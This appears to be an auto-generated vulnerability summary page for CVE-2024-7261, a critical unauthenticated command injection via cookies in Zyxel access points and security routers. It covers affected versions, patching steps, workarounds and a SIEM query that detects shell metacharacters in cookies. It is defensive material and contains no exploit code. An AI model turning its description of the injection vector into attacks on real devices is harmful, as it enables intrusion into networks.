CVE-2024-7261

Q: What is the severity of CVE-2024-7261?

CVE-2024-7261 has a CVSS score of 9.8 (CRITICAL). This is an unauthenticated OS command injection vulnerability in Zyxel networking devices that allows remote attackers to execute arbitrary commands on affected systems. Attackers can exploit it by sending specially crafted cookies to vulnerable CGI programs. Organizations using affected Zyxel access points and security routers are at risk.

9.8 CRITICAL

Remote Code Execution

📋 TL;DR

This is an unauthenticated OS command injection vulnerability in Zyxel networking devices that allows remote attackers to execute arbitrary commands on affected systems. Attackers can exploit it by sending specially crafted cookies to vulnerable CGI programs. Organizations using affected Zyxel access points and security routers are at risk.

💻 Affected Systems

Products:

Zyxel NWA1123ACv3
Zyxel WAC500
Zyxel WAX655E
Zyxel WBE530
Zyxel USG LITE 60AX

Versions: NWA1123ACv3: 6.70(ABVT.4) and earlier, WAC500: 6.70(ABVS.4) and earlier, WAX655E: 7.00(ACDO.1) and earlier, WBE530: 7.00(ACLE.1) and earlier, USG LITE 60AX: V2.00(ACIP.2) and earlier

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: All default configurations are vulnerable. No special configuration required for exploitation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, data exfiltration, ransomware deployment, and use as pivot point for lateral movement.

🟠

Likely Case

Device takeover enabling network reconnaissance, credential harvesting, and installation of persistent backdoors.

🟢

If Mitigated

Limited impact if devices are behind firewalls with strict ingress filtering and network segmentation.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation with CVSS 9.8 score indicates critical risk for internet-exposed devices.

🏢 Internal Only: MEDIUM - Still significant risk from internal threats or compromised hosts, but attack surface is reduced.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Unauthenticated exploitation with simple HTTP request manipulation makes this easily weaponizable. Public exploit code may emerge soon.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor advisory for specific fixed versions per product

Vendor Advisory: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024

Restart Required: Yes

Instructions:

1. Visit Zyxel support portal 2. Download latest firmware for your specific model 3. Backup current configuration 4. Upload firmware via web interface 5. Apply update 6. Reboot device 7. Verify version

🔧 Temporary Workarounds

Network Segmentation

all

Isolate affected devices in separate VLANs with strict firewall rules

Access Control

all

Restrict management interface access to trusted IP addresses only

🧯 If You Can't Patch

Immediately isolate affected devices from internet and critical network segments
Implement strict network monitoring and alerting for suspicious HTTP requests to CGI endpoints

🔍 How to Verify

Check if Vulnerable:

Check device firmware version via web interface or CLI against affected versions list

Check Version:

Login to device web interface and check System Information or use CLI command 'show version'

Verify Fix Applied:

Verify firmware version is newer than affected versions listed in vendor advisory

📡 Detection & Monitoring

Log Indicators:

Unusual HTTP requests to CGI endpoints
Multiple failed login attempts followed by successful access
Commands in HTTP cookie parameters

Network Indicators:

HTTP requests with suspicious cookie values containing shell metacharacters
Outbound connections from networking devices to unexpected destinations

SIEM Query:

source="firewall_logs" AND (uri="*.cgi" OR uri="*.cgi?*") AND (cookie CONTAINS "|" OR cookie CONTAINS ";" OR cookie CONTAINS "`" OR cookie CONTAINS "$")

📊 Metadata

CVE ID: CVE-2024-7261

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: September 3, 2024

Last Updated: September 13, 2024

🔗 References

https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024 Vendor Advisory

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Nwa110ax Firmware by Zyxel

Nwa1123 Ac Pro Firmware by Zyxel

Nwa1123acv3 Firmware by Zyxel

Nwa130be Firmware by Zyxel

Nwa210ax Firmware by Zyxel

Nwa220ax 6e Firmware by Zyxel

Nwa50ax Firmware by Zyxel

Nwa50ax Pro Firmware by Zyxel

Nwa55axe Firmware by Zyxel

Nwa90ax Firmware by Zyxel

Nwa90ax Pro Firmware by Zyxel

Usg Lite 60ax Firmware by Zyxel

Wac500 Firmware by Zyxel

Wac500h Firmware by Zyxel

Wac6103d I Firmware by Zyxel

Wac6502d S Firmware by Zyxel

Wac6503d S Firmware by Zyxel

Wac6552d S Firmware by Zyxel

Wac6553d E Firmware by Zyxel

Wax300h Firmware by Zyxel

Wax510d Firmware by Zyxel

Wax610d Firmware by Zyxel

Wax620d 6e Firmware by Zyxel

Wax630s Firmware by Zyxel

Wax640s 6e Firmware by Zyxel

Wax650s Firmware by Zyxel

Wax655e Firmware by Zyxel

Wbe530 Firmware by Zyxel

Wbe660s Firmware by Zyxel